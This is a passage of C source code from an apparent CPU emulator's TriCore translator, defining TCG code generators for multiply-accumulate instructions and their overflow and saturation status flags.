gen_maddui64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_maddu64_d(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_madd_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: 
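/* Note (an assumption inferred from the GEN_HELPER_* macro names, defined earlier in this file): the two letters in MODE_LL/LU/UL/UU select which 16-bit halfword of each source operand feeds the two partial multiplies, roughly L = lower halfword, U = upper halfword. */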
GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_addsub64_h(ctx, ret_low, ret_high, r1_low, r1_high, temp, temp2, tcg_gen_add_tl, tcg_gen_add_tl); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddsu_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_addsub64_h(ctx, ret_low, ret_high, r1_low, r1_high, temp, temp2, tcg_gen_sub_tl, tcg_gen_add_tl); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddsum_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_3 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_3, r1_low, r1_high); tcg_gen_sari_i64(tcg_ctx, temp64_2, temp64, 32); /* high */ tcg_gen_ext32s_i64(tcg_ctx, temp64, temp64); /* low */ tcg_gen_sub_i64(tcg_ctx, temp64, temp64_2, temp64); tcg_gen_shli_i64(tcg_ctx, temp64, temp64, 16); gen_add64_d(ctx, temp64_2, temp64_3, temp64); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64_2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); tcg_temp_free_i64(tcg_ctx, temp64_3); } static inline void gen_adds(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2); static inline void gen_madds_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_adds(ctx, ret_low, r1_low, temp); tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, temp3, tcg_ctx->cpu_PSW_AV); gen_adds(ctx, ret_high, r1_high, temp2); 
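/* Each gen_adds() call recomputes PSW_V/PSW_AV, so the low-half status bits were saved into temp/temp3 before the high-half add; the ORs below merge the status of both halves. */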
/* combine v bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* combine av bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_subs(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2); static inline void gen_maddsus_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_subs(ctx, ret_low, r1_low, temp); tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, temp3, tcg_ctx->cpu_PSW_AV); gen_adds(ctx, ret_high, r1_high, temp2); /* combine v bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* combine av bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddsums_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_sari_i64(tcg_ctx, temp64_2, temp64, 32); /* high */ tcg_gen_ext32s_i64(tcg_ctx, temp64, temp64); /* low */ tcg_gen_sub_i64(tcg_ctx, temp64, temp64_2, temp64); tcg_gen_shli_i64(tcg_ctx, temp64, temp64, 16); tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_helper_add64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, temp64_2, temp64); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); } static inline void gen_maddm_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_3 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_add64_d(ctx, temp64_3, temp64_2, 
temp64); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64_3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); tcg_temp_free_i64(tcg_ctx, temp64_3); } static inline void gen_maddms_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_helper_add64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, temp64_2, temp64); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); } static inline void gen_maddr64_h(DisasContext *ctx, TCGv ret, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } gen_helper_addr_h(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, r1_low, r1_high); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddr32_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_maddr64_h(ctx, ret, temp, temp2, r2, r3, n, mode); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_maddsur32_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_helper_addsur_h(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, temp, temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddr64s_h(DisasContext *ctx, TCGv ret, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: 
GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } gen_helper_addr_h_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, r1_low, r1_high); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddr32s_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_maddr64s_h(ctx, ret, temp, temp2, r2, r3, n, mode); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_maddsur32s_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_helper_addsur_h_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, temp, temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddr_q(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); gen_helper_maddr_q(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, r3, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_maddrs_q(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); gen_helper_maddr_q_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, r3, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_madd32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n, uint32_t up_shift) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_shli_i64(tcg_ctx, t2, t2, n); tcg_gen_ext_i32_i64(tcg_ctx, t1, arg1); tcg_gen_sari_i64(tcg_ctx, t2, t2, up_shift); tcg_gen_add_i64(tcg_ctx, t3, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, temp3, t3); /* calc v bit */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_GT, t1, t3, 0x7fffffffLL); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LT, t2, t3, -0x80000000LL); tcg_gen_or_i64(tcg_ctx, t1, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t1); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* We produce an overflow on the host if the mul before was ((0x80000000 * 0x80000000) << 1). If this is the case, we negate the ovf.
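Concretely, the only operands that hit this are arg2 == arg3 == 0x80000000: their product is +2^62 and the shift left by one wraps it to -2^63 on the host, so the V check above sees the addend with the wrong sign and yields exactly the inverted answer; the code below therefore XOR-flips bit 31 of PSW_V for that operand pair.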
*/ if (n == 1) { tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, arg2, 0x80000000); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, temp2, arg2, arg3); tcg_gen_and_tl(tcg_ctx, temp, temp, temp2); tcg_gen_shli_tl(tcg_ctx, temp, temp, 31); /* negate v bit, if special condition */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); } /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp3, temp3); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp3, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_m16add32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } gen_add_d(ctx, ret, arg1, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16adds32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } gen_adds(ctx, ret, arg1, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16add64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } tcg_gen_ext_i32_i64(tcg_ctx, t2, temp); tcg_gen_shli_i64(tcg_ctx, t2, t2, 16); tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); gen_add64_d(ctx, t3, t1, t2); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16adds64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = 
tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } tcg_gen_ext_i32_i64(tcg_ctx, t2, temp); tcg_gen_shli_i64(tcg_ctx, t2, t2, 16); tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); gen_helper_add64_ssov(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t2); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t1); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } static inline void gen_madd64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t4 = tcg_temp_new_i64(tcg_ctx); TCGv temp, temp2; tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); if (n != 0) { tcg_gen_shli_i64(tcg_ctx, t2, t2, 1); } tcg_gen_add_i64(tcg_ctx, t4, t1, t2); /* calc v bit */ tcg_gen_xor_i64(tcg_ctx, t3, t4, t1); tcg_gen_xor_i64(tcg_ctx, t2, t1, t2); tcg_gen_andc_i64(tcg_ctx, t3, t3, t2); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t3); /* We produce an overflow on the host if the mul before was ((0x80000000 * 0x80000000) << 1). If this is the case, we negate the ovf.
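Same host-side wraparound as in gen_madd32_q above; here too the computed V bit is exactly inverted when arg2 == arg3 == 0x80000000, hence the XOR fix-up below.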
*/ if (n == 1) { temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, arg2, 0x80000000); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, temp2, arg2, arg3); tcg_gen_and_tl(tcg_ctx, temp, temp, temp2); tcg_gen_shli_tl(tcg_ctx, temp, temp, 31); /* negate V bit if special condition */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t4); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, rh); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free_i64(tcg_ctx, t4); } static inline void gen_madds32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n, uint32_t up_shift) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t1, arg1); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_sari_i64(tcg_ctx, t2, t2, up_shift - n); gen_helper_madd32_q_add_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_madds64_q(DisasContext *ctx, TCGv 